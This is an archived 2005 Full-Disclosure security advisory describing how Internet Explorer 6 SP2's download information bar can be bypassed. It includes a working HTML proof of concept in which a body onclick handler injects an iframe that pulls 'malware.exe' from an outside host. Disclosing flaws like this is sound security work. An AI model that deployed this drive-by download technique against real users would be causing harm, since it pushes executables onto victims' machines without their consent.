lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050113143012.8F271101D0@ws1-3.us4.outblaze.com>
From: the_insider at mail.com (The Insider)
Subject: (no subject)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:       Internet Explorer
Vendors:           http://www.microsoft.com
Versions:          6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With:      SP2;
Platforms:         Windows
Bug:               Remote File Download Information Bar Bypass
Exploitation:      Remote with browser
Date:              13 Jan 2005
Author:            Rafel Ivgi, The-Insider
e-mail:            the_insider@...l.com
web:               http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the world.
Microsoft Windows XP Service Pack 2 was designed to block any file download
by an information bar which must be clicked and selected with "Download File".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

While trying to download a file Microsoft Internet Explorer
the user gets the information bar. The information bar
mechanism blocks/catches all references to download-able files,
even through javascripts and HTML Event properties.
However Microsoft's Internet Explorer (SP2) DOES NOT CATCH
"body" tag with the HTML "onclick" event which dynamically
created "iframe" tags. For a good, more complicated dynamic
object creation i used the "createElement" function.
This way an attacker can make a user download a file with him just
clicking anywhere on the page (not on an hyperlink).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan  1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>

embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/

\/theinsider.deep-

ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild

(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."
-- 
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ